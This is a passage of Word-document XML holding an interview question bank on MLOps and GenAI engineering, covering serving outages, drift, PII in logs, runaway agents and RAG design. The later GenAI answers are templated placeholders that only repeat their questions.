        <w:t>A: Treat drift as a signal for investigation, not automatic rollback. Check whether the drift matches an expected business event, compare model quality or proxy metrics by segment, and verify error rates, confidence, and downstream outcomes. If business impact is positive and quality signals are stable, downgrade to watch mode while documenting the event; if sensitive segments degrade, limit traffic or add guardrails for those segments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1581. MLOps situation - model serving outage: A model endpoint returns 5xx errors after scaling from 5 to 50 replicas. How would you debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check deployment events, pod logs, readiness failures, image pulls, resource limits, model load time, shared dependency limits, database or feature-store connections, and whether all replicas can access the model artifact. Large scale-ups often expose bottlenecks in startup, artifact download, file descriptors, connection pools, or quota. Mitigate by rolling back scale, increasing min ready time, preloading artifacts, tuning dependencies, or adding backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1582. MLOps situation - GPU quota shortage: A critical training job cannot start because GPU quota is exhausted. What immediate and long-term actions would you take?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Immediately check for idle or lower-priority GPU jobs to pause, move the job to another region/machine type if compatible, reduce parallelism, or run a smaller emergency training job. Long term, add GPU quota monitoring, priority classes, team budgets, reservations for critical workloads, spot/preemptible pools for non-critical experiments, and scheduling policies so important jobs are not blocked by ad hoc experimentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1583. MLOps situation - model artifact corruption: The registry points to a model artifact that cannot be loaded in production. How do you recover and prevent recurrence?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Recover by redeploying the previous known-good model version and verifying the artifact URI, checksum, permissions, and environment compatibility for the broken version. Prevent recurrence by making registration atomic, storing checksums, running a load test before promotion, keeping artifacts immutable, scanning/validating model packages, and preventing manual overwrites of production artifact paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1584. MLOps situation - rollback conflict: Product wants to keep a faster model, but risk wants rollback because accuracy dropped. How do you lead the decision?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Frame the decision around agreed release gates and user/business risk, not opinion. Show the latency gain, accuracy drop, affected segments, confidence interval, blast radius, rollback time, and alternatives such as partial rollout or feature flagging. If the model violates an approved guardrail, recommend rollback or limited traffic while a fix is prepared, and document the decision with product, risk, and engineering ownership.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1585. MLOps situation - missing ground truth: The business asks for model accuracy monitoring, but labels arrive after 30 days. What proxy signals and workflow would you design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use proxy signals such as prediction distribution, confidence scores, input drift, business funnel metrics, manual review samples, user feedback, and rule-based anomaly checks until labels arrive. Build a delayed-label evaluation job that backfills true quality metrics after 30 days, compares against the champion model, and updates dashboards. Be explicit that proxies do not replace ground truth; they are early-warning indicators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1586. MLOps situation - training-serving skew: Offline validation is strong, but online predictions are poor. How would you prove or rule out training-serving skew?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Log the exact online features used for predictions and replay a sample through the offline pipeline to compare values, transformations, defaults, encodings, timestamps, and missing-value handling. Check whether training and serving use the same feature code and data sources, and compare distributions by feature. If skew is found, fix the shared transformation/feature store path and add automated parity tests before deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1587. MLOps situation - PII leak risk: You discover raw customer data may be logged in model training or inference logs. What is your response plan?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First contain exposure by disabling or redacting the risky logs, restricting access, and preserving evidence for security review. Identify affected systems, time range, data types, and users with access, then involve security/privacy teams for incident classification and notification requirements. Prevent recurrence with PII detection, redaction by default, least-privilege log access, retention limits, and tests that fail builds if sensitive fields are logged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1588. MLOps situation - expensive experiment culture: Data scientists are launching many large training jobs without cost ownership. How would you introduce guardrails without blocking innovation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with visibility: labels, dashboards, per-team budgets, and cost by experiment/model. Then add soft guardrails such as default smaller machines, max runtime, quota warnings, spot/preemptible pools, approval for very large jobs, and reusable templates that make efficient choices easy. Keep a path for justified large experiments, but require ownership, expected value, and cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1589. MLOps situation - notebook to production: A data scientist has a high-performing notebook model. How do you turn it into a reliable production pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Extract the notebook into versioned modules, define data contracts, package dependencies in a container, create reproducible training and evaluation pipeline steps, log metrics/artifacts, register the model only if it passes gates, and deploy through a controlled serving path. Add tests, monitoring, rollback, ownership, and documentation so the result is not just a notebook result but an operable production system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1590. MLOps situation - flaky retraining pipeline: A retraining pipeline fails intermittently and teams rerun it manually. How would you stabilize it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Collect failure patterns first: step, error type, data version, infrastructure state, time, and retry outcome. Add idempotent steps, retries for transient failures, stronger data validation, explicit resource requests, timeouts, checkpointing, and clearer error messages. Remove manual reruns by making rerun behavior safe and automated, and track pipeline success rate as an SLO for the ML platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1591. MLOps situation - canary disagreement: Technical metrics look good in canary, but support tickets increase. How do you investigate and decide rollout?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pause expansion and segment the support tickets by user type, request pattern, geography, model output, and canary/control group. Technical metrics may miss user-facing quality issues, so compare qualitative examples, business outcomes, confidence, and edge cases. If the tickets correlate with the candidate model, roll back or narrow the canary and add a release gate for that failure mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1592. MLOps situation - compliance audit: An auditor asks how a prediction made three months ago was produced. What evidence should your platform provide?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The platform should show the model version, artifact checksum, training data snapshot, feature values or feature snapshot used at inference time, code commit, pipeline run, parameters, approval record, deployment history, input/output logs where legally allowed, and monitoring status at that time. This requires lineage and retention policies designed before the audit, not reconstructed manually afterward.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1593. MLOps situation - multi-team platform conflict: One team needs fast experimentation while another needs strict approval gates. How would you design the platform for both?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Separate experimentation and production paths. Give teams fast self-service sandboxes with quotas, templates, and lightweight governance, while production promotion requires stronger gates, approvals, lineage, security scans, and monitoring. The platform should make the easy path appropriate to the risk level instead of forcing every workflow through the same heavy process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1594. MLOps situation - stale features: Online feature values are stale but the model endpoint is healthy. How do you detect, mitigate, and redesign?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Detect stale features with freshness SLAs, timestamps, missing/update-rate checks, and alerts on feature-store lag, not just endpoint health. Mitigate by falling back to safe defaults, older champion model, cached validated features, or manual review depending on risk. Redesign with feature ownership, freshness dashboards, backfill/replay jobs, and serving logic that refuses unsafe stale inputs when required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1595. MLOps situation - disaster recovery: The region hosting your model registry and artifacts is unavailable. How would you continue serving and recover safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Serving should continue from already-loaded model replicas if possible, while new deployments are paused. For recovery, use replicated artifact storage, backup registry metadata, tested restore procedures, and a secondary region with known-good model versions. After failover, verify artifact checksums, model versions, traffic routing, and monitoring before resuming normal promotion workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1596. MLOps situation - interview unknown: You are asked about an MLOps tool you have not used directly. How do you answer honestly while still showing strong engineering judgment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Be honest about your hands-on level, then map the tool to concepts you do know: orchestration, tracking, registry, serving, monitoring, IAM, scaling, and rollback. Explain how you would evaluate it, what production questions you would ask, and how similar tools behave. A strong answer is not pretending; it is showing that your engineering model transfers across tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1597. Multi-tenant AI platform: How would you design tenant isolation, quota enforcement, and cost attribution for an internal platform that serves LLM access to multiple product teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Issue each team a scoped API key routed through an internal gateway that enforces per-tenant rate limits and token budgets, and tag every request with a tenant identifier so cost and usage can be attributed accurately in billing dashboards. Isolate tenant data (prompts, retrieved context, logs) so one team cannot see another's traffic, and give each team visibility into their own quota consumption so they can self-manage before hitting a hard limit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1598. Resume deep-dive - Vertex AI Pipelines: Walk me through a Vertex AI Pipeline you built end to end, from training through Vertex AI Model Registry to production deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A typical pipeline starts with a data validation and preprocessing component, feeds into a training component that logs metrics and artifacts to MLflow or Vertex Experiments, then a conditional evaluation step that only proceeds to registration if the new model beats the current production model on defined metrics. The approved model is registered in Vertex AI Model Registry with a version and metadata, then deployed to an endpoint via a canary or staged rollout, with the whole pipeline defined declaratively (Kubeflow Pipelines SDK) so it's reproducible and re-runnable on new data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1599. Resume deep-dive - LLMOps stack: You deployed Llama 3, Mistral, Ollama, and vLLM on Kubernetes. How did you choose between them and scale inference for concurrent users?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The choice depends on the use case: Ollama is convenient for quick local/dev experimentation and lower-throughput internal tools, while vLLM is the production serving choice for high-concurrency workloads because of its continuous batching and PagedAttention memory management, which dramatically improves throughput per GPU. Model choice (Llama 3 vs Mistral) came down to task performance on internal evals versus latency/cost tradeoffs at a given size. Scaling concurrent users meant horizontal pod autoscaling on GPU node pools, request queuing with backpressure so the service degrades gracefully rather than falling over, and continuous batching in vLLM to serve many concurrent requests per GPU efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1600. Resume deep-dive - model monitoring: You used Vertex AI Model Monitoring and Evidently AI for drift detection with automated retraining. How did you avoid false-positive retrains?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Set drift thresholds based on statistical significance and a minimum sample size rather than reacting to any single alert, and required drift to persist across multiple consecutive monitoring windows before triggering a retrain, so a temporary traffic anomaly wouldn't cause an unnecessary retrain. Retraining was also gated by an evaluation step - the new model only replaced the production model if it demonstrably improved on held-out metrics, so even an unnecessary retrain couldn't silently degrade production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1601. Resume deep-dive - secure MLOps: You implemented IAM, RBAC, Secrets Manager, and Binary Authorization for AI workloads. Walk me through one specific control and the risk it closed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Binary Authorization is a good example: it required every container image deployed to the ML serving cluster to carry a valid attestation from a vulnerability scan and CI pipeline signature before GKE would allow it to run, closing the risk of an unscanned or manually-pushed image (potentially with vulnerabilities or unauthorized code) reaching production. This meant no one, including someone with cluster access, could bypass the CI/CD pipeline and deploy an unverified image directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1602. Resume deep-dive - GitOps for AI: You used ArgoCD and Helm for AI application deployments. How is a GitOps rollout for model-serving different from a normal microservice rollout?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The Helm chart and Git state track not just application code but the model artifact reference (a versioned URI to the model in a registry or bucket), so a 'deployment' can mean either a code change or a model swap, and both need the same review and rollback discipline. Model-serving rollouts also need canary validation against model-specific metrics (accuracy, latency per token, GPU utilization) rather than just HTTP error rate, and rollback needs to revert both the serving code and the model version together, since deploying new code against an old model or vice versa can silently break behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1603. Scenario - hallucinated compliance answer: An LLM-powered support bot gave a customer incorrect regulatory advice that was later escalated. How would you investigate and prevent recurrence?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pull the exact prompt, retrieved context, and model version from request logs to see whether the failure was a retrieval gap (correct source existed but wasn't surfaced), a stale/incorrect source document, or the model contradicting correct retrieved context - each has a different fix. Immediately add a disclaimer and human-escalation path for regulatory/compliance-adjacent topics if one didn't already exist, then add that exact failure case to your evaluation regression suite so a prompt or model change can't silently reintroduce it, and consider a stricter policy (retrieval-grounded-only answers, or routing compliance topics to a human) for high-risk categories rather than trusting general-purpose generation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1604. Scenario - runaway agent loop: An autonomous agent got stuck in a tool-calling loop overnight and ran up a large API bill. How would you detect this faster and add guardrails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Add hard limits first: a max iteration/tool-call count per task, a per-task and per-hour token/cost budget that kills the run when exceeded, and a timeout on the overall task, since none of these should have allowed an unattended loop to run all night. For detection, add real-time alerting on cost-rate and call-rate anomalies (not just a daily billing report) so a runaway loop pages someone within minutes, and add loop-detection logic that flags when the agent repeats near-identical tool calls without new progress, so it fails fast and safe instead of retrying indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>GenAI &amp; LLM Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1605. RAG architecture: How would you design a production RAG pipeline - chunking strategy, embedding model choice, vector database, retrieval quality, and re-ranking - and how would you measure whether retrieval is actually good?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/LLM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GenAI/LLM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RAG architecture: How would you design a production RAG pipeline - chunking strategy, embedding model choice, vector database, retrieval quality, and re-ranking - and how would you measure whether retrieval is actually good?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1606. LLM serving on Kubernetes: How would you serve an open-weight LLM (e.g. via vLLM or TGI) on GKE - GPU node pools, batching, autoscaling, and request queuing under bursty load?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/LLM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GenAI/LLM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LLM serving on Kubernetes: How would you serve an open-weight LLM (e.g. via vLLM or TGI) on GKE - GPU node pools, batching, autoscaling, and request queuing under bursty load?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1607. Prompt injection and guardrails: How would you defend a production LLM application against prompt injection, data exfiltration through tool calls, and jailbreak attempts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/LLM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GenAI/LLM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Prompt injection and guardrails: How would you defend a production LLM application against prompt injection, data exfiltration through tool calls, and jailbreak attempts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1608. Fine-tuning vs RAG vs prompt engineering: What trade-offs would you weigh when choosing between fine-tuning, RAG, and prompt engineering for a new use case, and how would you decide?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/LLM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GenAI/LLM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Fine-tuning vs RAG vs prompt engineering: What trade-offs would you weigh when choosing between fine-tuning, RAG, and prompt engineering for a new use case, and how would you decide?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1609. Cost and latency optimization: An LLM feature is too slow and too expensive in production. What levers would you pull - caching, model routing between small and large models, quantization, batching, streaming?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/LLM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GenAI/LLM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Cost and latency optimization: An LLM feature is too slow and too expensive in production. What levers would you pull - caching, model routing between small and large models, quantization, batching, streaming?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1610. LLM evaluation in CI: How would you evaluate LLM output quality and catch regressions in CI before deploying a new prompt version or model version?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/LLM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GenAI/LLM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LLM evaluation in CI: How would you evaluate LLM output quality and catch regressions in CI before deploying a new prompt version or model version?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1611. Vector database operations: How would you operate and scale a vector database (e.g. pgvector, Pinecone, Weaviate) in production - indexing strategy, freshness, backup/restore, and cost at scale?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GenAI/LLM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GenAI/LLM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Vector database operations: How would you operate and scale a vector database (e.g. pgvector, Pinecone, Weaviate) in production - indexing strategy, freshness, backup/restore, and cost at scale?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1612. Agentic systems: For a multi-step, tool-calling agent pipeline, how would you design observability, failure handling, and guardrails so a bad tool call or infinite loop doesn't cause damage or runaway cost?</w:t>
      </w:r>
